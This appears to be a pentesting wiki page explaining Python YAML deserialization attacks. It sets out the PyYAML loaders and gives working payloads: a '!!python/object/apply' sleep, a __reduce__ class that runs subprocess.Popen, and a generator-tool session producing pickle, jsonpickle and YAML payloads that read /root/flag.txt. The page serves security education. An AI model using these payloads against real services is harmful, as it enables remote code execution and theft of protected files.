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# Python Yaml Deserialization
## Yaml **Deserialization**
2021-11-30 13:55:54 +00:00
**Yaml **python libraries is also capable to** serialize python objects** and not just raw data:
- l
- o
- l
- 1
- 10
- 1
Check how the **tuple** isnt a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
![](<../../.gitbook/assets/image (628).png>)
**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **dont support class object deserialization**. Class object deserialization example:
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:builtins.range [1, 10, 1]'
print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
print(yaml.load(data, Loader=Loader)) #range(1, 10)
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load(data)) #range(1, 10)
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object
2021-11-30 13:55:54 +00:00
The previous code used **unsafe\_load **to load the serialized python class. This is because in **version >= 5.1**, it doesnt allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
### Basic Exploit
Example on how to **execute a sleep**:
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:time.sleep [2]'
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
print(yaml.load(data, Loader=Loader)) #Executed
print(yaml.load_all(data, Loader=Loader))
print(yaml.load_all(data, Loader=UnsafeLoader))
print(yaml.load_all(data, Loader=FullLoader))
print(yaml.unsafe_load(data)) #Executed
## RCE
Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import subprocess
class Payload(object):
def __reduce__(self):
return (subprocess.Popen,('ls',))
deserialized_data = yaml.dump(Payload()) # serializing data
#- ls
print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
### Tool to create Payloads
The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:**
python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
Done Saving file !!!!
cat /tmp/example_jspick
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}
cat /tmp/example_pick | base64 -w0
cat /tmp/example_yaml
- !!python/tuple
- cat
- /root/flag.txt
## References
For more in depth information about this technique read: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)